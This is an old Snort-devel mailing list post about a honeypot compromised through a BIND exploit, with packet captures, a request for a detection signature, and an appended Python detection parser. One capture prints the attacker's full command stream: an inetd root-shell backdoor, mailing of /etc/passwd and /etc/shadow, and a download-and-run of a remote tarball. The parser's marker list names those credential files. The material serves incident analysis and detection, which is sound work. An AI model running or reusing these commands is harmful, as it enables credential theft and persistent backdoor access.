[Snort-devel] Bind exploit -- any ideas on creating a signature?

shawn . moyer shawn at ...232...
Tue Feb 27 22:28:53 EST 2001


My honeypot was recently compromised via a Bind exploit, and as far as I
can tell Snort doesn't have a signature for it. I did get one alert:

[**] IDS277 - NAMED Iquery Probe [**]
02/27-17:15:22.126692 0:3:6C:6:FC:8C -> 0:20:78:15:5E:80 type:0x800
len:0x41
210.233.X.X:2534 -> X.X.X.X:53 UDP TTL:40 TOS:0x0 ID:40154 IpLen:20
DgmLen:51
Len: 31

Unfortunately this alert doesn't necessarily state that an actual
exploit took place. My guess is that the named-iquery was followed with
an actual attack. 

I'm using Snort to log all traffic to and from the honeynet ( alert tcp
any any <> $HONEYPOT any, alert udp any any <> $HONEYPOT any), so I'm
including all of the relevant captures from the IP address above -- I
know the box was compromised b/c named died, inetd was restarted and
"1008 stream tcp nowait root /bin/sh sh" was added to inetd.conf. The
funny thing is that I went ahead and restarted named, disabled the
backdoor in inetd and the box was compromised almost exactly 24 hours
later by the same IP. 

The funny thing is that b/c the box is behind bimapped NAT, and the
script mails the output of 'ifconfig -a' to the SK's email addy., I
don't think he can find the box to get to it. :)

If this doesn't appear to be enough info, let me know and I'll see if I
can get another capture. Also, I've been running Snort with '-C', so I'm
afraid I don't have a hex dump yet.

Relevant info:

Linux mail 2.2.13 #127 Thu Oct 21 13:13:20 CDT 1999 i586 unknown

mail:/tmp/.../log# named -v
named 8.2.2-REL Sat Oct 23 20:10:05 CDT 1999
root at ...291...:/tmp/bind-8.2.2/src/bin/named

The box is running a default install of Slackware 7.0.

Here are the captures:

[**] UDP traffic logged [**]
02/27-17:15:22.126944 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x41
210.233.X.X:2534 -> 172.16.0.2:53 UDP TTL:39 TOS:0x0 ID:40154 IpLen:20
DgmLen:51
Len: 31
.................    .a^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] UDP traffic logged [**]
02/27-17:15:22.128052 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x2A2
172.16.0.2:53 -> 210.233.X.X:2534 UDP TTL:64 TOS:0x0 ID:33882 IpLen:20
DgmLen:660
Len: 640
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] UDP traffic logged [**]
02/27-17:15:22.323078 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x227
210.233.X.X:2534 -> 172.16.0.2:53 UDP TTL:39 TOS:0x0 ID:40326 IpLen:20
DgmLen:537
Len: 517
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] UDP traffic logged [**]
02/27-17:15:22.324382 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x23F
172.16.0.2:53 -> 210.233.X.X:2534 UDP TTL:64 TOS:0x0 ID:33883 IpLen:20
DgmLen:561
Len: 541
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.455846 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x4A
210.233.X.X:2447 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:38922 IpLen:20
DgmLen:60 DF
******S* Seq: 0x61833704  Ack: 0x0  Win: 0x7D78  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 16492729 0 NOP WS: 0 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.456596 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x4A
172.16.0.2:53 -> 210.233.X.X:2447 TCP TTL:64 TOS:0x0 ID:33878 IpLen:20
DgmLen:60 DF
***A**S* Seq: 0x975D6EAB  Ack: 0x61833705  Win: 0x3EBC  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 169830100 16492729 NOP 
TCP Options => WS: 0 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.664614 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x42
210.233.X.X:2447 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:39073 IpLen:20
DgmLen:52 DF
***A**** Seq: 0x61833705  Ack: 0x975D6EAC  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16492748 169830100 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.826386 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x42
210.233.X.X:2447 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:39231 IpLen:20
DgmLen:52 DF
***A***F Seq: 0x61833705  Ack: 0x975D6EAC  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16492766 169830100 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.826657 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x42
172.16.0.2:53 -> 210.233.X.X:2447 TCP TTL:64 TOS:0x0 ID:33879 IpLen:20
DgmLen:52 DF
***A**** Seq: 0x975D6EAC  Ack: 0x61833706  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 169830137 16492766 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:20.826853 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x42
172.16.0.2:53 -> 210.233.X.X:2447 TCP TTL:64 TOS:0x0 ID:33880 IpLen:20
DgmLen:52 DF
***A***F Seq: 0x975D6EAC  Ack: 0x61833706  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 169830137 16492766 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:21.023833 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x42
210.233.X.X:2447 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:39341 IpLen:20
DgmLen:52 DF
***A**** Seq: 0x61833706  Ack: 0x975D6EAD  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16492786 169830137 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:21.934749 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x4A
210.233.X.X:2552 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:40029 IpLen:20
DgmLen:60 DF
******S* Seq: 0x619DA465  Ack: 0x0  Win: 0x7D78  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 16492877 0 NOP WS: 0 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:21.935017 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x4A
172.16.0.2:53 -> 210.233.X.X:2552 TCP TTL:64 TOS:0x0 ID:33881 IpLen:20
DgmLen:60 DF
***A**S* Seq: 0x9681C8E4  Ack: 0x619DA466  Win: 0x3EBC  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 169830247 16492877 NOP 
TCP Options => WS: 0 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:22.118196 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x42
210.233.X.X:2552 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:40149 IpLen:20
DgmLen:52 DF
***A**** Seq: 0x619DA466  Ack: 0x9681C8E5  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16492895 169830247 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:23.324321 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x42
210.233.X.X:2552 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:41023 IpLen:20
DgmLen:52 DF
***A***F Seq: 0x619DA65A  Ack: 0x9681C8E5  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16493016 169830247 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:23.324645 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x4E
172.16.0.2:53 -> 210.233.X.X:2552 TCP TTL:64 TOS:0x0 ID:33884 IpLen:20
DgmLen:64 DF
***A**** Seq: 0x9681C8E5  Ack: 0x619DA466  Win: 0x3EBC  TcpLen: 44
TCP Options (6) => NOP NOP TS: 169830386 16492895 NOP NOP Sack:
24989 at ...306... 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:23.327329 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x236
210.233.X.X:2552 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:41022 IpLen:20
DgmLen:552 DF
***AP*** Seq: 0x619DA466  Ack: 0x9681C8E5  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16493016 169830247 
PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PAT
H;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.li
b;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con
f;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat
 /etc/shadow >>1i0n;mail 1i0nip at ...307... <1i0n;rm -fr 1i0n;rm -
fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i
0n.tgz;tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit;
..error.............................T...............^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:23.327968 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x42
172.16.0.2:53 -> 210.233.X.X:2552 TCP TTL:64 TOS:0x0 ID:33885 IpLen:20
DgmLen:52 DF
***A**** Seq: 0x9681C8E5  Ack: 0x619DA65B  Win: 0x3CC7  TcpLen: 32
TCP Options (3) => NOP NOP TS: 169830387 16493016 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:35.764194 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x63
172.16.0.2:53 -> 210.233.X.X:2552 TCP TTL:64 TOS:0x0 ID:33912 IpLen:20
DgmLen:85 DF
***AP*** Seq: 0x9681C8E5  Ack: 0x619DA65B  Win: 0x3CC7  TcpLen: 32
TCP Options (3) => NOP NOP TS: 169831630 16493016 
.gzip: stdin: not in gzip format.^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:35.776978 0:60:94:C3:BD:1F -> 0:20:78:16:E1:85 type:0x800
len:0x42
172.16.0.2:53 -> 210.233.X.X:2552 TCP TTL:64 TOS:0x0 ID:33913 IpLen:20
DgmLen:52 DF
***A*R** Seq: 0x9681C9AA  Ack: 0x619DA65B  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 169831632 16493016 
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] TCP traffic logged [**]
02/27-17:15:35.947510 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x36
210.233.X.X:2552 -> 172.16.0.2:53 TCP TTL:230 TOS:0x0 ID:50144 IpLen:20
DgmLen:40
*****R** Seq: 0x619DA65B  Ack: 0x0  Win: 0x0  TcpLen: 20
^@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

If you've read this far, thanks for your help!

--shawn

-- 
s h a w n   m o y e r
shawn at ...232...

Man will occasionally stumble over the truth,
but most of the time he will pick himself up and continue on.

					-- Churchill
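As an added example (not part of Shawn's post or of Snort), a small Python parser for the Snort '-C' ASCII log format shown above that flags TCP segments to port 53 whose payload carries shell-command strings, which is the kind of content match a signature for the post-exploit stage of this capture would key on. The sample record and its 10.0.0.1 source address are constructed.

```python
import re
# Constructed sample in the Snort "-C" ASCII format seen in this post; source IP is made up.
SAMPLE_LOG = """[**] TCP traffic logged [**]
02/27-17:15:23.327329 0:20:78:16:E1:85 -> 0:60:94:C3:BD:1F type:0x800
len:0x236
10.0.0.1:2552 -> 172.16.0.2:53 TCP TTL:39 TOS:0x0 ID:41022 IpLen:20
DgmLen:552 DF
***AP*** Seq: 0x619DA466  Ack: 0x9681C8E5  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16493016 169830247
PATH='/usr/bin:/bin';export PATH;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con
f;killall -HUP inetd;
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
"""

CONN_RE = re.compile(r"^(\S+):(\d+) -> (\S+):(\d+) (TCP|UDP) ")
# Last header line before payload: TCP options, the TCP flags line, or UDP "Len:".
HDR_END_RE = re.compile(r"^(TCP Options|[*A-Z0-9]{8} Seq:|Len: )")
# Strings a DNS stream never carries; the captured command stream did.
SHELL_MARKERS = ("/bin/sh", "inetd.conf", "/etc/passwd", "/etc/shadow")

def _record(lines):
    """Connection fields plus the payload, re-joined because Snort wraps it."""
    conn, end = None, -1
    for i, line in enumerate(lines):
        conn = CONN_RE.match(line) or conn
        if HDR_END_RE.match(line):
            end = i
    return conn and {"src": conn.group(1), "sport": int(conn.group(2)),
                     "dst": conn.group(3), "dport": int(conn.group(4)),
                     "proto": conn.group(5), "payload": "".join(lines[end + 1:])}

def parse_records(text):
    """Split the log on Snort's =+=+ separator lines and parse each record."""
    records, lines = [], []
    for line in text.splitlines():
        if line.startswith("=+=+"):
            records.append(_record(lines))
            lines = []
        elif line.strip():
            lines.append(line)
    return [r for r in records if r]

def find_shell_on_dns(records):
    """Flag TCP segments to port 53 whose payload carries shell-command markers."""
    hits = []
    for r in (r for r in records if r["proto"] == "TCP" and r["dport"] == 53):
        found = [m for m in SHELL_MARKERS if m in r["payload"]]
        if found:
            hits.append({"src": r["src"], "sport": r["sport"], "markers": found})
    return hits
```

Running it over a full '-C' log file instead of SAMPLE_LOG lists every source that pushed shell text into a port-53 session; a Snort content rule on the same strings gives the alert the original capture lacked.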
